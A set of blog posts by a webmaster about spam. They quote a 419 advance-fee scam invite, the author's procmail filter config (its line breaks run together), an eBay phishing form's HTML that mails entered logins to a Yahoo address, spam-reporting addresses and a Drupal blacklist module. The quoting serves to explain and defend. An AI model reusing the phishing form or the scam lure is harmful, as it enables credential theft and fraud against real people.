I received a new kind of spam today in my gmail account. It is an event invitation to participate in a 419 African deposit scam and apparently get my identity stolen in the process. Since I read my gmail in Thunderbird and have the Lightning add-on installed, all I needed to do was hit the accept button on the invitation to blast a message of receipt to the spammer. Now, I'll find out how to report this new spam type.

David Norman, you are invited to

Title: NOTIFICATION OF REQUEST
Time: Mon Mar 17 15:00 - 16:00 (Timezone: Eastern Time)
Calendar: David Norman
Description: Dear Friend,

I want you to assist me and my partner to receive a package which we are working on how to move it out of our country down to your country,and we promise to give you 30% of the package.

We only need: (1) Your full name (2) Your address (3) Mobile Telephone number (4) Your international passport number or Photograph for us to make the deposit with your name.

The flight will be living with the package this weekend that is why we need your assistance for us to make sure the package live immediately.

The content of the package is $15 million U.S dollars our company Sell Bloc, Crude Oil want to send this money to our customers in Europe through a security company and it was declare personal effect. We want to divert the money to you so that we all will shear it,So we want you to send us the needed information for us to deposit the money with your name to the security company that will be living with the package.

Please we are sorry if we have offended you for the assistance,but we believe the business will change our life. I wait your reply with the information so that we will deposit it with your name as the rightful beneficiary and after that we give you the: Goods Number, Code,The Tracking Number.

Hoping to hear from you.

Thanks and God bless us,

Dr.Graham Douglas

You can view this event at http://www.google.com/calendar/event?action=VIEW&eid=dGVvcnNodWxtOG1pYm1...

You can also view your calendar at http://www.google.com/calendar/

You are receiving this email at the account x@gmail.com because you are subscribed for invitations on calendar David Norman.

To stop receiving these notifications, please log in to http://www.google.com/calendar/ and change your notification settings for this calendar.

# $HOME/.procmailrc## Maildir delivery## (maildir = one file for each message, no locking needed for delivery)## (The following lines are needed as sendmail only can handle mbox delivery.#  Procmail will take care of the maildir delivery with these lines.)#DEFAULT=$HOME/Maildir/## Change to this directory#MAILDIR=$DEFAULT# Logging##VERBOSE=no# Logfile format: procmail_log_2004.06.11LOGFILE=$HOME/logs/procmail_log_`date "+%Y.%m.%d"`# Forward everything to spamassassin# The condition line ensures that only messages smaller than 250 kB# (250 * 1024 = 256000 bytes) are processed by SpamAssassin. Most spam# isn't bigger than a few k and working with big messages can bring# SpamAssassin to its knees.## The lock file ensures that only 1 spamassassin invocation happens# at 1 time, to keep the load down.## Uncomment the next 3 lines to enable spam tagging# In my particular case, the spam is already filtered# by a central mail server, so a second SA scan is redundant#:0fw:spam.lockfile#* < 256000#| /usr/local/bin/spamc -d localhost# SpamAssassin really thinks this is spam:0* ^X-Spam-Level: \*\*\*\*\*\*\*\*\*\*\*\*\*\*/dev/null:0* ^(Received|From):.*\.(kr|hu|tw|br|ru|cn|jp|pt|cz|cl|ro)\>/dev/null# CHINANET Hebei province 202.99.128.0 - 202.99.191.255 [202.99.183.163])   wide:0* ^Received:.*202\.99\.[0-9]+\.[0-9]+/dev/null# CHINANET Beijing province network  202.108.0.0 - 202.108.255.255 .163.com ([202.108.44.203] [202.108.44.205]:0* ^Received:.*202\.108\.[0-9]+\.[0-9]+/dev/null# CHINANET Guangdong province network 202.103.128.0 - 202.103.191.255 netease.com ([202.103.134.9]   wide:0* ^Received:.*202\.103\.[0-9]+\.[0-9]+/dev/null# China Telecom Shanghai  61.169.0.0 - 61.171.255.255 [61.170.130.217]:0* ^Received:.*\[61\.(169|17[0-1])\.[0-9]+\.[0-9]+/dev/null# Development Research Center of the# State Councile of China:0* ^Received:.*202\.106\.171\.[0-9]+/dev/null# CHINANET Jiangsu province network# Data Communication Division# China Telecom  61.132.0.0 - 61.132.127.255   wide:0* ^Received:.*\[61\.132\.[0-9]+\.[0-9]+/dev/null# Korea Network Information Center 203.232.0.0 - 203.239.255.255 websrv.pakatex.com ([203.233.4.2]) AdAd NY:0* ^Received:.*203\.23[2-9]\.[0-9]+\.[0-9]+/dev/null# Korea Network Information Center# 211.32.0.0 - 211.39.255.255# 211.40.0.0 - 211.41.255.255# 211.41.0.0 - 211.51.255.255# 211.52.0.0 - 211.63.255.255## 211.168.0.0 - 211.171.255.255# 211.172.0.0 - 211.199.255.255#(aussie blocks in between):0* ^Received:.*211\.[0-9]+\.[0-9]+\.[0-9]+/dev/null# drugs:0 HB* (accutane|allegra|allergy|ambien|cialis|cipro|codeine|coumadin|diazepam|effexor|herbal|hydroxycut|levitra|lexapro|MEDFEST|migrane|norvasc|oxycontin|paxil|phentermin|propecia|prozac|valium|xan(a|e)x|xenical|zyban|pharmac(y|ies)|ritalin|tramadol|valium|(V|v)(i|1|ii)(a|@)gr(a|@)|zocor|zoloft|zyban|zyrtec)/dev/null# sex:0 HB* (anal|blowjob|bondage|c(o|0)ck|cum|erection|fuck|impotenc(e|y|ey)|masturbat(e|ion)|(o|0)rgy|pen(i|1)s|pussy|xxx)/dev/null# finance:0 HB* (Benin|c(a|@)s(i|1)n(o|0)|Nigeria|refinanc(e|ing|ment)|rep(l|1|\|)(i|1)ca|rolex)/dev/null:H* ^From:.*spamcop\@devnull.spamcop.net* ^Subject:.*has accepted.*emails for processing/dev/null:0 HB* (Amsterdam|blackjack|boob|breast|dick|fetish|girth|huss(ies|y)|inch|lesbian|nude|pills|poker|p(o|0)rn|(O|0)EM|remit|tits).Junk/:0:* ^Content-Type:.*charset="(.*big5|iso-2022-jp|ISO-2022-KR|euc-kr|gb2312|ks_c_5601-1987|windows-1251|windows-1256)* ^Content-Type: .*ks_c_5601-1987* ^Content-Type: .*[gG][bB]2312* ^Subject: \=\?GB2312\?.** ^Subject: \=\?big5\?.** ^Content-Type: text/html; charset=euc-kr* ^Content-Type: text/html; charset="euc-kr"* ^Subject: \[[gG][bB]2312\].** ^Subject: \[[Bb]ig5\].*.Junk/# Move Spam Assassin flagged mails to the SPAM folder inside your INBOX# (format for Maildir is .foldername/ or .foldername.subfoldername/)# Uncomment the next 3 lines to filter spam into a dedicated spam folder:0:* ^X-Spam-Flag: YES* ^X-Spam-Level: \*\*\*\*\*.Junk/# Everything not processed yet goes into to the normal inbox

A new phishing scam for Ebay actually embeds the login form in the email so you can't even hover over the link to the site and see if it's a legit URL or not. Thunderbird tagged this email as a suspected scam, but I clicked the "not a scam" box to see what it actually looked like.

The key part of the login form shows not only does it submit through a form processor and copy the login information to someone's yahoo account, but it redirects you afterwards to the legit ebay.com site so you can actually login. The form HTML looks like:

<FORM NAME="ContactForm" ACTION="http://webtools.gmti.com/cgi-bin/webforms.pl" METHOD="POST"><INPUT TYPE=hidden NAME=mailto VALUE="hajerttyun@yahoo.com"><INPUT TYPE=hidden NAME=mailsubject VALUE="Userutzu Si Parolutza"><INPUT TYPE=hidden NAME=redirect VALUE="https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&pUserId=&co_partnerId=2&siteid=0&pageType=222&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fcontact.ebay.com%3A80%2Fws%2FeBayISAPI.dll%3FReturnUserEmail%26contactsubmit%3DContact%2BMember%26MfcISAPICommand%3DReturnUserEmail%26frm%3D279%26iid%3D-1%26requested%3Dwjj67%26redirect%3D0%26de%3Doff&pp=&errmsg=8">

If you send me spam, I automatically turn around and forward it to the following addresses:

• spam@uce.gov
• spam@barracudanetworks.com
• reportspam@ipswitch.com
• submit@respam.com
• spam@sendusspam.com
• spam@mailpolice.com
• spam@mail-filters.com
• spam@postini.com
• spam@support.trendmicro.com
• junk@brightmail.com
• ...and my secret spamcop.net address

When it also involves phishing, I add the following:

• phishing-report@us-cert.gov
• scams@fraudwatchinternational.com
• reportphishing@antiphishing.org
• fraud@phishfraud.com
• Report@reportphish.org

Then two of the most popular spams I get are stock tips and cialis/viagra junk, so I forward them to enforcement@sec.gov and webcomplaints@ora.fda.gov respectively. Then 419 Nigerian scams to get 12 million dollars of free money for just "borrowing" my checking account, get forwarded to 419.fcd@usss.treas.gov, even though I don't think much can be done about them. If I'm in a particularly bad mood, I forward OEM/cheap software spam to piracy@microsoft.com, spamwatch@symantec.com, and/or piracy@adobe.com, since Symantec, Adobe, and Microsoft are almost always part of their catalog.

I looked up some of the addresses of visitors to deekayen.net who've attempted to leave spam, whether it be referrer, comment, or contact form spam. About half of them were listed in the SPEWS.org Level 1 list. Naturally, I decided I needed to block those operations from messing with any of my sites. From SPEWS:

The majority of the Level 1 list is made up of netblocks owned by the spammers or spam support operations themselves, with few or no other legitimate customers detected.

Two days later, I committed support for the Drupal troll module to import the SPEWS Level 1 & 2 lists, and the okean.com lists of netblocks owned by China and Korea. What you can do to blacklisted visitors:

• add a random stutter of 1-5 seconds to the page output
• drop form POST submission data
• always send blank pages
• always send a 404 not found message
• always redirect to an alternate URL

Of course, there's a whitelist to make sure you don't lock yourself out of your own site and you can lookup IP addresses in a search form to see if they match IP blocks in the blacklist. I don't have PostgreSQL to test support for that, but otherwise, it just needs some peer review to get branched for DRUPAL-4-7 in CVS.